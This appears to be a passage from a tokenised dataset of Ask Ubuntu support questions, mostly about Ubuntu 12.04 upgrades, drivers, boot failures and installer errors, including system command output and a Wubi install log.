snd_hda_intel , snd_hda_codec > snd_seq_midi 13324 0 snd_rawmidi 30748 1 > snd_seq_midi b43 365785 0 snd_seq_midi_event > 14899 1 snd_seq_midi mac80211 506816 1 b43 snd_seq > 61896 2 snd_seq_midi , snd_seq_midi_event snd_timer 29990 > 2 snd_pcm , snd_seq snd_seq_device 14540 3 > snd_seq_midi , snd_rawmidi , snd_seq cfg80211 205544 2 > b43 , mac80211 mac_hid 13253 0 bcma > 26696 1 b43 snd 78855 15 > snd_hda_codec_idt , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device > soundcore 15091 1 snd snd_page_alloc 18529 2 > snd_hda_intel , snd_pcm sky2 59043 0 ssb > 52752 1 b43 i915 468651 3 ums_realtek > 18248 0 uas 18027 0 wmi > 19256 1 dell_wmi drm_kms_helper 46978 1 i915 drm > 242038 4 i915 , drm_kms_helper i2c_algo_bit 13423 1 i915 > video 19596 1 i915 usb_storage 49198 1 > ums_realtek then ifconfig -a > eth0 link encap : ethernet hwaddr 00:23 : ae:35:91 : e3 > up broadcast multicast mtu:1500 metric:1 > rx packets:0 errors:0 dropped:0 overruns:0 frame:0 > tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 > collisions:0 txqueuelen:1000 > rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) > interrupt:18 > > lo link encap : local loopback > inet addr:127.0.0.1 mask:255.0.0.0 > inet6 addr : : :1/128 scope : host > up loopback running mtu:16436 metric:1 > rx packets:80 errors:0 dropped:0 overruns:0 frame:0 > tx packets:80 errors:0 dropped:0 overruns:0 carrier:0 > collisions:0 txqueuelen:0 > rx bytes:6560 ( 6.5 kb ) tx bytes:6560 ( 6.5 kb ) > > wlan0 link encap : ethernet hwaddr 00:24:2c:20 : ce:28 > broadcast multicast mtu:1500 metric:1 > rx packets:0 errors:0 dropped:0 overruns:0 frame:0 > tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 > collisions:0 txqueuelen:1000 > rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) and finally iwconfig > lo no wireless extensions . > > wlan0 ieee 802.11bg essid : off/any > mode : managed access point : not-associated tx-power=0 dbm > retry long limit:7 rts thr : off fragment thr : off > power management : on > eth0 no wireless extensions . i follow all the step stated on the `` installing sta drivers '' and i still ca n't connect to internet . the enable wireless connection is tick but no wireless network are available . please tell in what can i do so you can help me get online . thank you very much for you responses .
125800	seemingly missing keyboard shortcuts ; can i create them myself ?	i 've noticed that ctrl+alt+numpad moves a window around to fill bits of the screen , but it seems to be missing three shortcuts : ctrl+alt+num4 to fill the left , ctrl+alt+num6 to fill the right , and some sort of keyboard shortcut to move a window from one monitor to the other ( like super+shift+right or super+shift+left in windows 7 ) . can i somehow make these three keyboard shortcuts work ? edit : found out ctrl+super+left and ctrl+super+right to fill the left and right halves of the screen , but still no way to move a window between monitors .
125801	how to upgrade from 32bit wubi to 64bit wubi ?	i have a 12.04 beta 2 wubi installed . i want to change it to a 64 bit wubi when i upgrade to the final 12.04 version . would i need to uninstall the old wubi and then reinstall a complete new one ? when i download the wubi , it does not say if it 's 32 or 64 bit . so how do i upgrade/reinstall to wubi 64 bit ? my system is intel® core™ i5 cpu m 540 @ 2.53ghz × 4 . it has 4 gb of ram . so , i guess it 's capable of running a 64-bit os .
125805	after upgrading to 12.04 from 10.04 , ca n't login to phpmyadmin	i just ca n't login to phpmyadmin anymore , it says bad logins . php works perfectly . please help . thank you . 2002 can not log in to the mysql server language log in username : password : connection for controluser as defined in your configuration failed .
125806	how do i install ubuntu 12.04 by the windows 7 ?	before , the ubuntu 11.10 install by windows 7 .
125807	reading network-manager password from another hdd	today i cloned my ubuntu 11.10 into my old hdd , and installed 12.04 into my current hdd . what i need now is to recover passwords for my vpn connections on the network manager that is in the old 11.10 cloned hdd , but i do n't want to boot it . i can read and write to that disk from the newly installed ubuntu 12.04 , so where should i look for those passwords ?
125810	having trouble installing ... or even entering the os	i recently got interested in ubuntu and already read allot about it in the internet and a book i bought and decided to install it today . i downloaded the version 12.04 64 bit and tried to install it by booting up the disc , but i could n't even access the menu or anything because it would just crash , trying to show a menu . i downloaded the 32 bit but same thing happened and searched for other alternatives . i installed it via alternative way ( the one with a simple gui ) and it was successful but when i try to access the partition with the os it still crashes right there . i 'm guessing its the video card and i search online and try different commands , but for some reason they are unsuccessful . my pc specs are : asus m4a89gtd-pro phenom x4 unlocked 5 cores at 4ghz 6gb of kingston memory amd radeon hd 6790 if you need addition details please ask . im sorry if its a stupid question , i am new to the operating system and learning . thank you for your support . edit : here is the image i get every time it gets near a gui when installing or alredy installed http : //imageshack.us/photo/my-images/85/img20120426222430.jpg/
125812	ubuntu not booting after upgrade to 12.04 from 11.10	i upgraded to 12.04 from 11.10 today . after the upgrade , i did the usual reboot of the system and then ubuntu hangs on checking battery state.. [ ok ] . i can login to terminal with ctrl-alt-f5 and i did startx but it hangs after displaying white images of the desktop icons..there is no menu or any top bar at all . i guess this problem has something to do with xserver , but i can not find xorg.conf on my system . how can i get around this problem ? also is there a way i can make a backup of my files through the command line , because the gui is not showing up at all ?
125813	connecting empathy to windows live	i 've just upgraded to 12.04 ( coming from 11.10 ) . in 11.10 windows live accounts worked perfectly ( i suppose empathy was 3.2 . * ) , but now in 12.04 , it 's 3.4.1 and the account i had was lost . it does n't seem to have an option to add new windows live accounts , though . here 's what empathy 's option window looks like : so , did i forget to install anything , or do i need some kind of workaround ? or even , how can i downgrade back to empathy 3.2 . * if it 's the only way to make this work ?
125819	upgrade to 12.04 , first boot stuck on checking battery state	i upgraded my 11.10 to 12.04 but it stuck on the first boot . i alt+shift+del many times . but it does not go further . i have lenovo n200 machine with dual boot windows 7 and ubuntu 11.10 . switched to ubuntu 11.04 . and all was going fine since my last night upgrade activity . how i can proceed further ? i have taken my home folder backup . if i have to re-install it . any help ? edit : my graphic card is intel corporation gm965/gl960 integrated graphic controller .
125825	upgrading lts to lts ( server ) -- why wait for the first point release ?	does anyone know the ( specific ) reasons that it is recommended that old lts server users wait until 14.04.1 to upgrade ? is it just a matter of bug fixes and waiting for improved stability for production servers , or is there something more fundamental than that ?
125831	installing a package from repositories of an older release on a newer ubuntu	snmpd for ubuntu 11.10 has some issues , so i want to install snmpd from ubuntu 10.04 lucid repositories . how can this be done ?
125838	unity panel not working in 12.04 ?	i just upgrade to 12.04 and when i want to launch the unity panel pointing the mouse on the left edge of the monitor it wont launch or it will take a long time to show up .
125839	unity greeter login screen has a garbled white dot grid ?	i am running 12.04 on three machines . on one of the machines i am running an intel 82g33/g31 express integrated graphics controller as a display adapter . on this particular machine the grid of white dots overlaid on top of the wallpaper for the currently selected user is messed up big time . once i move the mouse , the graphics magically fix themselves . then if i select a new user the grid of dots is messed up again until i move the mouse . once i log in the graphics seem to be running fine . any ideas ?
125841	upgrade error due to another package management application running	i use ubuntu 11.10 on my desktop pc . my update manager shows me the upgrade link to 12.04 lts but when i click on it , and follow the instructions , my installation halts at the small 'distribution upgrade ' window that shows the steps that the installation takes to install the new package ( e.g 'preparing to upgrade ' and 'setting new software channels ' etc ) . not even a second after the 'distribution upgrade ' window appears , a error message saying 'unable to get exclusive lock ' appears with the message : this usually means that another package management application ( like apt-get or aptitude ) already running . please close that application first . i then clicked cancel and went back to the update manager to try again . there i unchecked all the updates and then clicked on the 'upgrade ' to 12.04 button and the same thing happens again . i tried with different user accounts but still no change . this is not the first time i used to install ubuntu via update manager . i first installed ubuntu 10.10 from the live cd and then when ubuntu 11.04 and 11.10 came out i installed them via update manager with no problem . please help me solve this .
125842	how to add folder or file to launcher ?	why is n't it allowed automatically ? how can i do it ? thanks . if it 's not possible , how can i access folder in the fastest way ? how do you do it ?
125843	dash search gives no result	i just upgraded my ubuntu 11.10 ( x86 ) to ubuntu 12.04 ( x86 ) . the upgrade completed without any errors . since then , i am unable to access any of the applications in the dash . the dash seems to be empty . when i search for some application like gedit , it says `` sorry , there is nothing that matches your search '' . is there any way to fix it ?
125844	shutdown does not power off computer	i recently upgraded from ubuntu 11.10 to 12.04 . if it makes any difference , my system is a dell inspiron 1520 . i encounter a problem whenever i shutdown or restart ; it kills all running processes ( as far as i can tell ) , but once i get past the shutdown text screen and the screen goes black , my computer does n't power off . the fans still run and the screen is still on , etc . i have to hold down the power button in order to complety shut down . does anyone know how to resolve this problem ?
125845	how to add /var folder to ubuntu one storage to sync ?	ubuntu one allows only /home folders to sync . why ? i want to sync the /var folder too .
125847	un-removable /etc/resolv.conf	during an upgrade to 12.04 today i 've got an error when running post-install hook for resolvconf package : setting up resolvconf ( 1.63ubuntu11 ) ... resolvconf.postinst : error : can not replace the current /etc/resolv.conf with a symbolic link because it is immutable . to correct this problem , gain root privileges in a terminal and run 'chattr -i /etc/resolv.conf ' and then 'dpkg -- configure resolvconf ' . aborting . well , surely i tried running chattr -i /etc/resolv.conf , but dpkg -- configure resolvconf produced the same error . i tried to move or delete the file manually , but i ca n't do this even as root : sudo mv /etc/resolv.conf /etc/resolv.conf.old mv : can not move `/etc/resolv.conf ' to `/etc/resolv.conf.old ' : operation not permitted sudo rm /etc/resolv.conf rm : can not remove `/etc/resolv.conf ' : operation not permitted i am able to create and then delete a file in /etc ( as root ) , so the root partition is not mounted read-only or anything . also : lsattr /etc/resolv.conf -- -- -a -- -- -- -- - /etc/resolv.conf
125848	upgraded to 12.04 from 11.10 , images do not load , pointer does not move	i just upgraded to 12.04 through upgrade manager and the system is now unusable ( after a fresh install of 11.10 had been working perfectly for 4 months . ) when i log in , the icons on the unity menu do not load . when i open the unity menu using the windows key , i can search and see results but again the icons do not appear . the top bar only displays my user name and the other icons appear only as 'xs ' . most importantly , i can not move the pointer using my trackpad or wireless usb mouse . the window switching menu does not appear when i press ctrl+shift so i have no way to get into the terminal to try any troubleshooting . i realize 12.04 just came out today but has anyone else experienced problems like this ? hardware : hp pavilion laptop . intel centrino processor , intel graphics .
125853	download ubuntu 12.04 through vuze ?	i have ubuntu 11.04 installed on my system . now as ubuntu 12.04 is released i want to download the latter through vuze . so how to download the ubuntu 12.04 disk image in vuze ?
125858	how to enable ubuntu 3d desktop effects ?	when i start ubuntu session starts in 2d only , i have installed the latest drivers nvidia . 01:00.0 vga compatible controller : nvidia corporation g72m [ quadro nvs 110m/geforce go 7300 ] ( rev a1 )
125860	how to install sis 671/771 video drivers in ubuntu ?	does sis have any drivers available for their 671/771 `` video card '' ? how can i install it and set it to 1280x800 resolution ?
125873	how to get skype 's indicator on 12.04	after upgrading to 12.04 ( 64bit ) , i 've started installing the programs that i used to have on 10.04 , one of them is skype . downloaded the .deb file from skypes website and installed it using the ubuntu software center . however , when i launch skype , it doesnt add an indicator to the top menu like it used to , which means that when i click the 'x ' on the program 's window , it goes away , i cant reopen it , and i 'm still logged in . how can i get the indicator back ? thank you
125874	should a relatively conservative user untick `` unsupported updates ( precise-backports ) '' in software sources ?	i installed 12.04 rc a few days before the release date and it is now updated fully . it 's working just fine and it is my os for regular work . i have a question regarding `` software sources '' . in the picture , three items are ticked ( by default , i presume ) under install updates from : . should i untick unsupported updates ( precise-backports ) since i now want a relatively stable user experience ( although i run sudo apt-get update and sudo apt-get upgrade quite a few times a day and that has n't been a problem at all . )
125875	just installed 11.10 on a pc that had problems with 9 - first run , screens going black	last time i had ubuntu on this pc the screen would go black every few seconds and stay black for a bit , that was running 9 , now i 've upgraded to 11.10 hoping that would fix the issue , but the issue still seems to remain , only it 's not as bad as it was with 9 . i can at least ask for help this time around . but anyway it 's clearly something wrong with the graphics card ( nvidia gt 240 ) i had to use nomodeset so that i could install properly , and i want to know if i should grab the drivers off of jockey , or grab them directly from nvidia . i installed 11.10 on a laptop with radeon hd 6700m graphics a couple of days a go , and i had a hell of a time getting opengl to work . i had to download the catalyst driver from radeon , purge the drivers jockey gave me , start up without graphics and install the ati drivers that way . i speak too soon , it 's still going black on and off.. gon na try a restart ... i 'd rather not go through that bloody hassle again . based on my experience with the radeon 12 hours ago : getting the drivers from nvidia , starting up without xorg , purging the drivers that are there and planting the nvidia drivers in will be what i need to do : unless some one has a simpler way that is n't going to tank my nice fresh install , but if there 's no nicer way , please let me know what packages i 'm going to need to purge . it 's not blacking out now ... but i still do n't trust it . going to install chrome because i can trust it 's about : //gpu data to tell me if my gfx card is working fully or not . gltron is running , so opengl that 's a good sign , and jockey just jumped up and said it 's activated a recommended driver - looks like i was fretting over nothing . this driver seems to work so i 'll stick with it . might as well ask what i wanted to ask next since i 've wasted a post . is 12.04 any good or should i wait to see a video walkthrough before i upgrade ? i 'm really digging 11.10 here . awesome alt-tab and workspace flow . i was a doubter of full screen apps but i 'm not anymore , after 2 days of unity/11.10
125882	grub rescue error : hd0 out of disk	i was playing a game on my multiboot windows 7 + ubuntu laptop . it froze , so i force shutdown the computer . when i load it back up , i get : error : hd0 out of disk . when i do ls , it gives me : ( hd0 ) ( hd0 , msdos6 ) ( hd0 , msdos5 ) ( hd0 , msdos2 ) ( hd0 , msdos1 ) but when i try to do insmod ( hd0 , msdos5 ) /boot/grub/linux.mod , i get : error : hd0 out of disk anyone have any ideas ? thanks in advance .
125883	how to change ubuntu one windows location	my c drive is full and ubuntu one is taking a lot of space can i change the default location of ubuntu one folder on windows from c drive to d drive
125886	innodb_buffer_pool_size not changing	i have encountered a weird problem with innodb_buffer_pool_size configuration on 5.5.23-1~dotdeb.0 ( debian ) : whatever new value that i choose in my.cnf for innodb_buffer_pool_size ( e.g 3g , 4g , 8000m ) , after restarting mysql i still get innodb_buffer_pool_size = 128 m. values of other my.cnf parameters can be changed without any issue . i have also checked and have no other my.cnf on the file system other than /etc/mysql/my.dnf . so does this mean that innodb_buffer_pool_size = 128 m is hard-coded at compile time ? if so , how can i fix this ? if not , what can possibly have caused the problem ? thanks p.s . i first asked this question at dba forum but people there seem not to have insight about mysql debian package .
125891	panel settings not appearing on right-click in gnome	i just installed ubuntu 12.04 . i switched to gnome classic from unity as i 'm more comfortable with the former . however , i could n't find where the panel setting are . usually a drop down menu appears on right-clicking the top and bottom panels . but it does n't happen now . i need the panel settings so as to auto hide the panels ( as my netbook screen is quite small ! ) as well as to add the `` system monitor '' applet to the panel which is really useful . where can i find the panel settings ?
125892	what is the difference between 12.04 desktop & 12.04 server images	i 've installed ubuntu 11.10 desktop version on my machine and i am using it as dhcp server come firewall . so if i can use desktop version to configure any kind of machine we want then what is the purpose of server version . can we use server version to install a simple desktop ? does the server version have some additional features ?
125896	install hang on rebooting ( scsi-disk problem )	after successfully installing ubuntu 11.10 earlier this day on my laptop , i was ready to do the same at my desktop alongside with windows . i downloaded the newest 12.04 , burned the image and booted into install . after installing , i was told to reboot . so far so good . but when i now boot ( of course without the dvd ) , i get some errors ( ? ) and the booting stops . the last 3 lines are : sd 22:0:0:0 [ sdl ] no caching mode page present sd 22:0:0:0 [ sdl ] assuming drive cache : writethrough sd 22:0:0:0 [ sdl ] attached scsi disk ... and that 's all . i have tried to unplug both my external drives , and the cardreader but still no luck . how can i solve this ? edit : tried ubuntu 11.04 and also mint ; same result .
125898	how can i make the unity launcher pop out in 12.04 as it did in 11.10 ?	either it 's there all the time or it 's completely gone forever ! annoying . i prefer the way it handled in 11.10 , where you had the program open in full screen in cursing over to the left side made the unity launcher pop out .
125903	keyboard not working on a samsung 300e5a laptop	i tried to install ubuntu 12.04 on a samsung 300e5a laptop . the keyboard was not available during the installation , i do n't know why , so i thought that it was just a glitch , and i used to virtual keyboard to finish the installation ( login , password ... ) i thought that the keyboard will be enabled at boot , but it still does n't work . does anybody know how to fix that ?
125908	`` there is another file or directory with this name. `` error while installing inside windows	i tried to install ubuntu 11.10 inside windows , it showed error occurred , permission denied , for more see the log file . last week i tried to install xubuntu , it showed same problem . but i installed ubuntu before trying xubuntu , it perfectly installed and worked fine . i uninstalled ubuntu before installing xubuntu . i do n't understand the log file . it looks like this : 04-27 12:24 error root : can not install into d : \ubuntu . there is another file or directory with this name . please remove it before continuing . traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 130 , in select_task file `` \lib\wubi\application.py '' , line 205 , in run_cd_menu file `` \lib\wubi\application.py '' , line 120 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\win32\backend.py '' , line 82 , in select_target_dir exception : can not install into d : \ubuntu . there is another file or directory with this name . please remove it before continuing . 04-27 12:25 info root : === wubi 11.10 rev241 === 04-27 12:25 debug root : logfile is c : \users\sialnuan\appdata\local\temp\wubi-11.10-rev241.log 04-27 12:25 debug root : sys.argv = [ 'main.pyo ' , ' -- exefile= '' e : \\wubi.exe '' ' , ' -- cdmenu ' ] 04-27 12:25 debug commonbackend : data_dir=c : \users\sialnuan\appdata\local\temp\pyl8b7d.tmp\data 04-27 12:25 debug windowsbackend : 7z=c : \users\sialnuan\appdata\local\temp\pyl8b7d.tmp\bin\7z.exe 04-27 12:25 debug windowsbackend : startup_folder=c : \programdata\microsoft\windows\start menu\programs\startup 04-27 12:25 debug commonbackend : fetching basic info ... 04-27 12:25 debug commonbackend : original_exe=e : \wubi.exe 04-27 12:25 debug commonbackend : platform=win32 04-27 12:25 debug commonbackend : osname=nt 04-27 12:25 debug commonbackend : language=en_in 04-27 12:25 debug commonbackend : encoding=cp1252 04-27 12:25 debug windowsbackend : arch=amd64 04-27 12:25 debug commonbackend : parsing isolist=c : \users\sialnuan\appdata\local\temp\pyl8b7d.tmp\data\isolist.ini 04-27 12:25 debug commonbackend : adding distro xubuntu-i386 04-27 12:25 debug commonbackend : adding distro xubuntu-amd64 04-27 12:25 debug commonbackend : adding distro kubuntu-amd64 04-27 12:25 debug commonbackend : adding distro mythbuntu-i386 04-27 12:25 debug commonbackend : adding distro ubuntu-amd64 04-27 12:25 debug commonbackend : adding distro ubuntu-i386 04-27 12:25 debug commonbackend : adding distro mythbuntu-amd64 04-27 12:25 debug commonbackend : adding distro kubuntu-i386 04-27 12:25 debug windowsbackend : fetching host info ... 04-27 12:25 debug windowsbackend : registry_key=software\microsoft\windows\currentversion\uninstall\wubi 04-27 12:25 debug windowsbackend : windows version=vista 04-27 12:25 debug windowsbackend : windows_version2=windows 7 home premium 04-27 12:25 debug windowsbackend : windows_sp=none 04-27 12:25 debug windowsbackend : windows_build=7600 04-27 12:25 debug windowsbackend : gmt=5 04-27 12:25 debug windowsbackend : country=in 04-27 12:25 debug windowsbackend : timezone=asia/calcutta 04-27 12:25 debug windowsbackend : windows_username=sialnuan 04-27 12:25 debug windowsbackend : user_full_name=sialnuan 04-27 12:25 debug windowsbackend : user_directory=c : \users\sialnuan 04-27 12:25 debug windowsbackend : windows_language_code=1033 04-27 12:25 debug windowsbackend : windows_language=english 04-27 12:25 debug windowsbackend : processor_name=intel ( r ) core ( tm ) 2 duo cpu t6600 @ 2.20ghz 04-27 12:25 debug windowsbackend : bootloader=vista 04-27 12:25 debug windowsbackend : system_drive=drive ( c : hd 17858.78125 mb free ntfs ) 04-27 12:25 debug windowsbackend : drive=drive ( c : hd 17858.78125 mb free ntfs ) 04-27 12:25 debug windowsbackend : drive=drive ( d : hd 9921.94140625 mb free ntfs ) 04-27 12:25 debug windowsbackend : drive=drive ( e : cd 0.0 mb free cdfs ) 04-27 12:25 debug windowsbackend : drive=drive ( f : cd 0.0 mb free cdfs ) 04-27 12:25 debug windowsbackend : drive=drive ( g : removable 1909.5625 mb free fat ) 04-27 12:25 debug windowsbackend : drive=drive ( i : hd 169383.378906 mb free ntfs ) 04-27 12:25 debug windowsbackend : uninstaller_path=none 04-27 12:25 debug windowsbackend : previous_target_dir=none 04-27 12:25 debug windowsbackend : previous_distro_name=none 04-27 12:25 debug windowsbackend : keyboard_id=67699721 04-27 12:25 debug windowsbackend : keyboard_layout=us 04-27 12:25 debug windowsbackend : keyboard_variant= 04-27 12:25 debug commonbackend : python locale= ( 'en_in ' , 'cp1252 ' ) 04-27 12:25 debug commonbackend : locale=en_in 04-27 12:25 debug windowsbackend : total_memory_mb=2047.99999905 04-27 12:25 debug commonbackend : searching isos on usb devices 04-27 12:25 debug commonbackend : searching for local cds 04-27 12:25 debug distro : checking whether c : \users\sialnuan\appdata\local\temp\pyl8b7d.tmp is a valid ubuntu cd 04-27 12:25 debug distro : does not contain c : \users\sialnuan\appdata\local\temp\pyl8b7d.tmp\casper\filesystem.squashfs 04-27 12:25 debug distro : checking whether c : \users\sialnuan\appdata\local\temp\pyl8b7d.tmp is a valid ubuntu cd 04-27 12:25 debug distro : does not contain c : \users\sialnuan\appdata\local\temp\pyl8b7d.tmp\casper\filesystem.squashfs 04-27 12:25 debug distro : checking whether c : \users\sialnuan\appdata\local\temp\pyl8b7d.tmp is a valid kubuntu cd 04-27 12:25 debug distro : does not contain c : \users\sialnuan\appdata\local\temp\pyl8b7d.tmp\casper\filesystem.squashfs 04-27 12:25 debug distro : checking whether c : \users\sialnuan\appdata\local\temp\pyl8b7d.tmp is a valid kubuntu cd 04-27 12:25 debug distro : does not contain c : \users\sialnuan\appdata\local\temp\pyl8b7d.tmp\casper\filesystem.squashfs 04-27 12:25 debug distro : checking whether c : \users\sialnuan\appdata\local\temp\pyl8b7d.tmp is a valid xubuntu cd 04-27 12:25 debug distro : does not contain c : \users\sialnuan\appdata\local\temp\pyl8b7d.tmp\casper\filesystem.squashfs 04-27 12:25 debug distro : checking whether c : \users\sialnuan\appdata\local\temp\pyl8b7d.tmp is a valid xubuntu cd 04-27 12:25 debug distro : does not contain c : \users\sialnuan\appdata\local\temp\pyl8b7d.tmp\casper\filesystem.squashfs 04-27 12:25 debug distro : checking whether c : \users\sialnuan\appdata\local\temp\pyl8b7d.tmp is a valid mythbuntu cd 04-27 12:25 debug distro : does not contain c : \users\sialnuan\appdata\local\temp\pyl8b7d.tmp\casper\filesystem.squashfs 04-27 12:25 debug distro : checking whether c : \users\sialnuan\appdata\local\temp\pyl8b7d.tmp is a valid mythbuntu cd 04-27 12:25 debug distro : does not contain c : \users\sialnuan\appdata\local\temp\pyl8b7d.tmp\casper\filesystem.squashfs 04-27 12:25 debug distro : checking whether d : \ is a valid ubuntu cd 04-27 12:25 debug distro : does not contain d : \casper\filesystem.squashfs 04-27 12:25 debug distro : checking whether d : \ is a valid ubuntu cd 04-27 12:25 debug distro : does not contain d : \casper\filesystem.squashfs 04-27 12:25 debug distro : checking whether d : \ is a valid kubuntu cd 04-27 12:25 debug distro : does not contain d : \casper\filesystem.squashfs 04-27 12:25 debug distro : checking whether d : \ is a valid kubuntu cd 04-27 12:25 debug distro : does not contain d : \casper\filesystem.squashfs 04-27 12:25 debug distro : checking whether d : \ is a valid xubuntu cd 04-27 12:25 debug distro : does not contain d : \casper\filesystem.squashfs 04-27 12:25 debug distro : checking whether d : \ is a valid xubuntu cd 04-27 12:25 debug distro : does not contain d : \casper\filesystem.squashfs 04-27 12:25 debug distro : checking whether d : \ is a valid mythbuntu cd 04-27 12:25 debug distro : does not contain d : \casper\filesystem.squashfs 04-27 12:25 debug distro : checking whether d : \ is a valid mythbuntu cd 04-27 12:25 debug distro : does not contain d : \casper\filesystem.squashfs 04-27 12:25 debug distro : checking whether e : \ is a valid ubuntu cd 04-27 12:25 debug distro : parsing info from str=ubuntu 11.10 `` oneiric ocelot '' - release i386 ( 20111012 ) 04-27 12:25 debug distro : parsed info= { 'name ' : 'ubuntu ' , 'subversion ' : 'release ' , 'version ' : '11.10 ' , 'build ' : '20111012 ' , 'codename ' : 'oneiric ocelot ' , 'arch ' : 'i386 ' } 04-27 12:25 info distro : found a valid cd for ubuntu : e : \ 04-27 12:25 info root : running the cd menu ... 04-27 12:25 debug windowsfrontend : __init__ ... 04-27 12:25 debug windowsfrontend : on_init ... 04-27 12:25 info winuipage : appname=wubi , localedir=c : \users\sialnuan\appdata\local\temp\pyl8b7d.tmp\translations , languages= [ 'en_in ' , 'en ' ] 04-27 12:25 info winuipage : appname=wubi , localedir=c : \users\sialnuan\appdata\local\temp\pyl8b7d.tmp\translations , languages= [ 'en_in ' , 'en ' ] 04-27 12:25 info root : cd menu finished 04-27 12:25 info root : running the installer ... 04-27 12:25 info winuipage : appname=wubi , localedir=c : \users\sialnuan\appdata\local\temp\pyl8b7d.tmp\translations , languages= [ 'en_in ' , 'en ' ] 04-27 12:25 info winuipage : appname=wubi , localedir=c : \users\sialnuan\appdata\local\temp\pyl8b7d.tmp\translations , languages= [ 'en_in ' , 'en ' ] 04-27 12:25 debug winuiinstallationpage : target_drive=d : , installation_size=7000mb , distro_name=ubuntu , language=en_us , locale=en_us.utf-8 , username=sialnuan 04-27 12:25 info root : received settings 04-27 12:25 info winuipage : appname=wubi , localedir=c : \users\sialnuan\appdata\local\temp\pyl8b7d.tmp\translations , languages= [ 'en_us ' , 'en ' ] 04-27 12:25 debug tasklist : # running tasklist ... 04-27 12:25 debug tasklist : # # running select_target_dir ... 04-27 12:25 info windowsbackend : installing into d : \ubuntu 04-27 12:25 debug tasklist : # # finished select_target_dir 04-27 12:25 debug tasklist : # # running create_dir_structure ... 04-27 12:25 debug commonbackend : creating dir d : \ubuntu 04-27 12:25 debug commonbackend : creating dir d : \ubuntu\disks 04-27 12:25 debug commonbackend : creating dir d : \ubuntu\install 04-27 12:25 debug commonbackend : creating dir d : \ubuntu\install\boot 04-27 12:25 debug commonbackend : creating dir d : \ubuntu\disks\boot 04-27 12:25 debug commonbackend : creating dir d : \ubuntu\disks\boot\grub 04-27 12:25 debug commonbackend : creating dir d : \ubuntu\install\boot\grub 04-27 12:25 debug tasklist : # # finished create_dir_structure 04-27 12:25 debug tasklist : # # running uncompress_target_dir ... 04-27 12:25 debug tasklist : # # finished uncompress_target_dir 04-27 12:25 debug tasklist : # # running create_uninstaller ... 04-27 12:25 debug windowsbackend : copying uninstaller e : \wubi.exe - > d : \ubuntu\uninstall-wubi.exe 04-27 12:25 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi uninstallstring d : \ubuntu\uninstall-wubi.exe 04-27 12:25 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi installationdir d : \ubuntu 04-27 12:25 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi displayname ubuntu 04-27 12:25 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi displayicon d : \ubuntu\ubuntu.ico 04-27 12:25 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi displayversion 11.10-rev241 04-27 12:25 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi publisher ubuntu 04-27 12:25 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi urlinfoabout http : //www.ubuntu.com 04-27 12:25 debug registry : setting registry key -2147483646 software\microsoft\windows\currentversion\uninstall\wubi helplink http : //www.ubuntu.com/support 04-27 12:25 debug tasklist : # # finished create_uninstaller 04-27 12:25 debug tasklist : # # running copy_installation_files ... 04-27 12:25 debug windowsbackend : copying c : \users\sialnuan\appdata\local\temp\pyl8b7d.tmp\data\custom-installation - > d : \ubuntu\install\custom-installation 04-27 12:25 debug windowsbackend : copying c : \users\sialnuan\appdata\local\temp\pyl8b7d.tmp\winboot - > d : \ubuntu\winboot 04-27 12:25 debug windowsbackend : copying c : \users\sialnuan\appdata\local\temp\pyl8b7d.tmp\data\images\ubuntu.ico - > d : \ubuntu\ubuntu.ico 04-27 12:25 debug tasklist : # # finished copy_installation_files 04-27 12:25 debug tasklist : # # running get_iso ... 04-27 12:25 debug tasklist : new task copy_file 04-27 12:25 debug tasklist : # # # running copy_file ... 04-27 12:26 error tasklist : [ errno 13 ] permission denied traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\utils.py '' , line 202 , in copy_file ioerror : [ errno 13 ] permission denied 04-27 12:26 debug tasklist : # cancelling tasklist 04-27 12:26 error root : [ errno 13 ] permission denied traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 130 , in select_task file `` \lib\wubi\application.py '' , line 205 , in run_cd_menu file `` \lib\wubi\application.py '' , line 120 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\utils.py '' , line 202 , in copy_file ioerror : [ errno 13 ] permission denied 04-27 12:26 debug tasklist : new task check_iso 04-27 12:26 error tasklist : 'windowsbackend ' object has no attribute 'iso_path' traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 579 , in get_iso file `` \lib\wubi\backends\common\backend.py '' , line 565 , in use_iso attributeerror : 'windowsbackend ' object has no attribute 'iso_path' 04-27 12:26 debug tasklist : # cancelling tasklist 04-27 12:26 debug tasklist : # finished tasklist
